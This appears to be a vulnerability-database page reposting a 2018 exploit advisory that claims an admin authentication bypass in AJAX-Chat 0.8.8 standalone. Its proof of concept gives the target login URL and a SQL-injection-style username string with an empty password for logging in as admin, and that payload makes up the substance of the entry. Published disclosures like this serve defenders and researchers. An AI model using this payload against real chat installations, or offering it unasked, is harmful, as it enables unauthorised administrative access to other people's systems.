AJAX-Chat-0.8.8-standalone - Authentication Bypass

2018.07.11

Ashiyane Digital Security Team (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

|===============================================|
|                         In The Name Of GOD
|===============================================|
| Exploit Title: AJAX-Chat-0.8.8-standalone - Authentication Bypass
| Dork: N/A
| Date: 2018-07-10
| Exploit Author: Ashiyane Digital Security TEAM
| Vendor Homepage: https://frug.github.io/AJAX-Chat/
| Software Link : https://github.com/Frug/AJAX-Chat/archive/0.8.8-standalone.zip
| Version: v0.8.8
| Category: Web apps
| CVE: N/A
|===============================================|
| Description:
| With this exploit,attacker can bypass admin login authentication.
|
|===============================================|
|
| Proof of Concept :
|
| http://localhost/PATH/chat/index.php
| 
| Username : admin  or  'or' '='
| Password :  
|===============================================|

See this note in RAW Version

Vote for this issue:

72%

28%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

AJAX-Chat-0.8.8-standalone - Authentication Bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.